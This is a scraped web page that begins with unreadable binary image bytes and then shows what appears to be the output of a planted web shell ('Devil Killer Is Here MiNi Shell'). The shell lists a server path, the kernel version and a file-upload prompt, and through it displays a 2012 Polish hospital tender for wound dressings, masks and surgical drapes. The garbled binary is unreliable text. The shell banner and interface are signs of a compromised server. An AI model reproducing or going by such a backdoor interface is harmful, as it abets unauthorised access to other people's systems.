JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120406/110624-N-2012.html

<p class="kh_header"><b>Pyskowice: Dostawa środków opatrunkowych dla SPZOZ Szpitala Powiatowego w Pyskowicach</b><br>
<b>Numer ogłoszenia: 110624 - 2012; data zamieszczenia: 06.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Powiatowy , ul. Szpitalna 2, 44-120 Pyskowice, woj. śląskie, tel. 032 2332424, faks 032 2332424 w. 230.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalpyskowice.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa środków opatrunkowych dla SPZOZ Szpitala Powiatowego w Pyskowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa środków opatrunkowych podzielona na 8 zadania.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.11-1, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.16-6, 33.14.11.18-0, 33.14.11.19-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia- niespełna</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia- niespełna</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia- niespełna</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia- niespełna</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia- niespełna</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalpyskowice.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SPZOZ Szpital Powiatowy
Szpitalna 2
44-120 Pyskowice
sekretariat dyrekcji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2012 godzina 14:00, miejsce: SPZOZ Szpital Powiatowy
Szpitalna 2
44-120 Pyskowice
sekretariat dyrekcji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wata celulozowa , bielona,arkusze, 40 x 60cm, a 5 kg +/- 10 % ( wyrób medyczny )     	kg	1600	   
2.	Wata opatrunkowa ( bawełniano-wiskozowa ) a 500 g                  	op	60	   
3.	Gaza bawełniana , 13 nitkowa, szerokość 90cm, a 100mb (klasa IIa,reguła 7)	mb	2000	   
4.	Opaska dziana 10cmx4m, pakowana pojedynczo                         	szt	4500	   
5.	Opaska dziana 15cmx4m, pakowana pojedynczo                         	szt	7500	   
6.	Opaska dziana 5cmx4m, pakowana pojedynczo                          	szt	250	   
7.	Opaska elastyczna , tkana z zapinką (zapinka wewnątrz opakowania),pakowana pojedynczo, 15cmx4m                                       	szt	1500	   
9.	Kompresy gazowe, niejałowe,z podwijanymi brzegami, 17 nitkowe, 8 warstwowe, 10cmx10cmx100szt ( wyrób medyczny klasy IIa,minimum   reguła 7), 	op	600	   
11.	Opaska gipsowa , czas wiązania 5 minut  +/- 1 minuta a 14cmx3m                                              	szt	30	   
12.	Opaska gipsowa , czas wiązania 5 minut +/- 1 minuta a 12cmx3m                                              	szt	30	   
13.	Opaska gipsowa , czas wiązania 5 minut, +/- 1 minuta a 10cmx3m                                               	szt	30	   
14.	Chusta trójkątna bawełniana, niejałowa                             	szt	100	   
15.	Podkład chłonny,nieprzepuszczający wilgoci, wkład chłonny z rozdrobnonej celulozy, rozmiar 60cmx90cm  +/- 3 cm                                	szt	4000	   
16.	Wysokochłonne, kombinowane kompresy a 10x20 jałowe, pakowane pojedynczo, 	szt.	1000	   
17.	Prześcieradło niejałowe wykonane z włókniny typu SMS o gramaturze min. 35g/m2 200- 210x150-160 cm 	szt	1500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.15-9, 33.14.11.16-6, 33.14.11.19-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Maski chirurgiczne wykonane z włókniny 3-warstwowej, wiązane na   troki , posiadające usztywnioną częścią na nos, poziom filtracji  bakteryjnej 98%, rozmiar minimum 175mmx100mm +/-1cm.   	szt	7500	   
2.	Czapki chirurgiczne wykonane z włókniny polipropylenowej o gramaturze minimum 14g/m2 w formie beretu z gumką na całym obwodzie        	szt	6000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Serweta operacyjna gazowa jałowa, z elementem RTG i taśmą,minimum 17 nitek, 4warstwy 40-45cmx40-45cm ( wyrób medyczny klasy IIa, reguła 7) Opakowanie a 2 szt.	op	800	   
1	Pakiet jałowy kompresów gazowych 17n 8w , opk.=40 szt., rozmiar a 10x10cm 	op=40szt	400	   
2	Pakiet jałowy kompresów gazowych 17n 8w, opk.= 20 szt., rozmiar a 10x10cm 	op=20szt.	200	   
3	Fartuch chirurgiczny, wyjałowiony, jednorazowego użytku; wykonany na całym obszarze z jednego typu włókniny o gramaturze minimum 35g/m2, nie zawierający LATEKSU, mankiet rękawa wykonany z 100%  POLIESTRU, rękaw typu reglan, szwy wykonane techniką ultradźwiękową. Wiązany na podwójne troki, z tyłu poły nakładają się na siebie, umożliwiając jałowe wiązanie fartucha. Rozmiar:M,L lub XL,	szt	2500	   
4	Serweta wyjałowiona , wykonana z włókniny dwuwarstwowej o gramaturze minimum 50g/m2,w składzie musi występować warstwa wykonana z folii polietylenowej,, nieprzylepna, rozmiar 90x130-150cm                 	szt	1500	   
6	Sterylny zestaw wykonany z dwuwarstwowej pełno-barierowej włókniny  (zgodnej z EN 13795 1,2,3) o gramaturze min. 54g/m2. Wymagane jest aby jedną z warstw materiału stanowiła folia PE. Chłonność min. 440%. Obłożenie powinna cechować wysoka odporność na penetrację płynów (zgodnie z EN 20811)>180 cm H2O oraz odporność na rozerwanie >100kPa (zgodnie z EN 13938-1).
Minimalny skład zestawu:                                                           
1 serweta na stolik narzędziowy 140-150 x 180-190 cm ze wzmocnieniem 
1 obłożenie stolika Mayo złożone teleskopowo 80 x 145 cm 
1 samoprzylepna serweta operacyjna 150-180 x 240 cm 
1 samoprzylepna serweta operacyjna 150-170 x 175-180 cm 
2 samoprzylepne serwety operacyjne 75-80 x 90 cm 
1 taśma samoprzylepna 9-10 x 50 cm
4 ręczniki celulozowe min.20- 33 x 33-40 cm
(Zamawiający wymaga przedstawienia dokumentów potwierdzających spełniane wymogów zawartych w SWIZ )	zestaw	150	   
7	Serweta wyjałowiona , przylepna, wykonana z włókniny dwuwarstwowej o gramaturze minimum 50g/m2,w składzie musi występować warstwa wykonana z folii polietylenowej , rozmiar 45cmx75cm z możliwością dostosowania, regulacji  otworu                 	szt	400	   
8	Włóknikowa , jałowa osłona na kończynę w rozmiarze 25-45x80cm 	szt	40	   
9	Serweta wyjałowiona , wykonana z włókniny dwuwarstwowej o gramaturze minimum 50g/m2,w składzie musi występować warstwa wykonana z folii polietylenowej, nieprzylepna, rozmiar 45cmx75cm                 	szt	700	   
10	Zestaw chirurgiczny ( spodnie + bluza z krótkim rękawem),niejałowy, wykonany z włókniny typu SMMS o gramaturze minimum  45g/m2. Rozmiar:S,M,L,XL,XXL .( Zamawiający wymaga przedstawienia dokumentów potwierdzających spełniane wymogów zawartych w SWIZ )           	zestaw	2000	   
11	Tampony z celulozy, niejałowe na rolce 4x5cm ,  opk.a 500szt	opk=500szt	800	   
12	Pojemniki na tampony kompatybilne z poz. 11	szt.	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.11-1, 33.14.11.10-4, 33.14.11.14-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Opaska elastyczna podtrzymująca o rozciągliwości 160%,a 6cmx4m - dziana	szt	1200	   
1.	Jałowy opatrunek włókninowy o zaokrąglonych rogach z warstwą chłonną , pakowany pojedynczo, a 7,2cmx5cm ( klej z syntetycznego kauczuku lub akrylowy )      	szt	2000	   
2.	Jałowy opatrunek włókninowy o zaokrąglonych rogach z warstwą chłonną , pakowany pojedynczo, a 8cmx15cm ( klej z syntetycznego kauczuku lub akrylowy )      	szt	4000	   
3.	Jałowy opatrunek włóknino wy o zaokrąglonych rogach z warstwą chłonną , pakowany pojedynczo, a 6cmx10cm ( klej z syntetycznego kauczuku lub akrylowy )      	szt	4000	   
4.	Jałowy opatrunek włókninowy o zaokrąglonych rogach z warstwą chłonną , pakowany pojedynczo, a 10cmx20cm ( klej z syntetycznego kauczuku lub akrylowy )      	szt	1000	   
5.	Jałowy opatrunek włókninowy o zaokrąglonych rogach z warstwą chłonną , pakowany pojedynczo, a 10cmx25cm ( klej z syntetycznego kauczuku lub akrylowy )      	szt	5000	   
6.	Włókninowy opatrunek z nacięciem do mocowania kaniul, o zaokrąglonych rogach, pakowany pojedynczo z dodatkową poduszeczką a 5,8-6,0cm x 8,0cm ( klej z syntetycznego kauczuku lub akrylowy )  opk.a50 szt  	szt	10500	   
7.	Plaster na tkaninie białej wiskozowej 100%, pokrytej klejem z syntetycznego kauczuku lub akrylowym a 5cmx5m       	szt	400	   
8.	Plaster włókninowy z opatrunkiem, niejałowy, a 6cmx5m 	szt	5	   
9.	Włókninowy, niejałowy plaster do mocowania opatrunków, a 10cmx10m (klej z syntetycznego kauczuku lub akrylowy)  	szt	10	   
10.	Włókninowy, niejałowy plaster do mocowania opatrunków, a 5cmx10m (klej z syntetycznego kauczuku lub akrylowy)  	szt	20	   
11.	Włókninowe, jałowe paski do łączenia brzegów ran, zastępujące nici chirurgiczne, a 6mmx37-38mm                                        	szt	1000	   
12.	Elastyczny, siatkowy rękaw, o dużych oczkach do mocowania opatrunków na dłoń,ramię ,stopa, opakowanie a 25mb w stanie roboczym               	szt	5	   
13.	Elastyczny, siatkowy rękaw o  dużych oczkach do mocowania opatrunków głowa,tułów dziecka, opakowanie a 25mb. w stanie roboczym               	szt	3	   
14.	Elastyczny, siatkowy rękaw o dużych oczkach  do mocowania opatrunków na tułów dorosłego, opakowanie a 25mb. w stanie roboczym             	szt	1	   
15.	Opatrunek samoprzylepny z folii poliuretanowej, przepuszczający parę wodną i tlen a 10cmx15cm                                      	szt	300	   
16.	Jałowy, przeźroczysty opatrunek wykonany z foli poliuretanowej do mocowania wenflonów a 7cmx9cm opakowanie a 50 szt.	opk.=50 szt	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.16-6, 33.14.11.10-4, 33.14.11.11-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b>  	Jałowy opatrunek z siatki bawełnianej, pokrytej maścią bez substancji czynnych, pakowany pojedynczo , a 10cm x 10cm  	szt	100	   
